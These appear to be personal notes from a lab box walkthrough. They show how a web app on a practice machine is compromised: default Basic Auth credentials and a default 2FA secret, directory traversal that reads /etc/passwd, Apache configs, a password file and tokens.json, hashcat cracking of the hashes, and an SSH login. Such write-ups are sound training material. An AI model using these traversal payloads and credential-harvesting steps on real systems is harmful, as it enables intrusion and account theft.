2 :80

http://192.168.76.144
Landing Page
| requires Basic Auth

# trying admin:admin works

http://192.168.76.144/auth/auth?/
Page to enter Auth token

# source shows
<!-- itemir/apache_2fa -->

# googling this takes me to 
https://github.com/itemir/apache_2fa

# Under https://github.com/itemir/apache_2fa#instructions
# mentioned a default secret key ND4LKCSFMUQISO6CBZQATLDP
# using plugin https://addons.mozilla.org/en-US/firefox/addon/auth-helper/
# generated code and its works

http://192.168.76.144/?
Page showing jobs
Jobs: [ps aux | w | uptime]

# after running job
http://192.168.76.144/index.php?workon=am9iPXc=

# result is shown on a different page
http://192.168.76.144/spool/viewresult.php?view=192.168.49.76_1630813122.txt

# directory traversal is possible
http://192.168.76.144/spool/viewresult.php?view=/etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
fox:x:1000:1000::/home/fox:/bin/sh

# trying to run command via base64
doesn't work

# reading apache config file
http://192.168.76.144/spool/viewresult.php?view=/etc/apache2/apache2.conf
[truncated]
IncludeOptional sites-enabled/*.conf

# virtual host is enabled, getting that config
http://192.168.76.144/spool/viewresult.php?view=/etc/apache2/sites-available/000-default.conf

AuthType Basic
AuthName "offsec"
AuthUserFile /opt/apache_2fa/apache_credentials
Require valid-user

http://192.168.76.144/spool/viewresult.php?view=/opt/apache_2fa/apache_credentials
admin:$apr1$pa.RhgPO$18S/xeIW24UvBgjVJJXiC1
fox:$apr1$JWr/q2vH$KXhhk03ukqkoXjbOIoUVp/

$ hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt --show
$apr1$pa.RhgPO$18S/xeIW24UvBgjVJJXiC1:admin
$apr1$JWr/q2vH$KXhhk03ukqkoXjbOIoUVp/:THERESE

$ ssh fox@192.168.76.144
Password: THERESE
Verification code: ??

# asking for verification code means there is 2fa?
# tried the OTP, but not working

# Looking at the repo again to check what files might contain info
# https://github.com/itemir/apache_2fa
# auth | tokens.json

http://192.168.76.144/spool/viewresult.php?view=/opt/apache_2fa/auth
TOKEN_FILE = os.path.join(BASE_DIR, 'tokens.json')

http://192.168.76.144/spool/viewresult.php?view=/opt/apache_2fa/tokens.json
{
  "admin": "ND4LKCSFMUQISO6CBZQATLDP",
  "fox": "RTW2ARWLJZRWUCN54UO22FDQ6I"
}

# tried verification code as RTW2ARWLJZRWUCN54UO22FDQ6I
# didnt work

# maybe use that to generate OTP like before,

# works
$ ssh fox@192.168.76.144
Password: THERESE
Verification code: <OTP CODE w/ RTW2ARWLJZRWUCN54UO22FDQ6I>

You have mail.
$ whoami;id;hostname;uname -a
fox
uid=1000(fox) gid=1000(fox) groups=1000(fox)
g00g
Linux g00g 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
Previous3 box enum foxNext1 recon

Last updated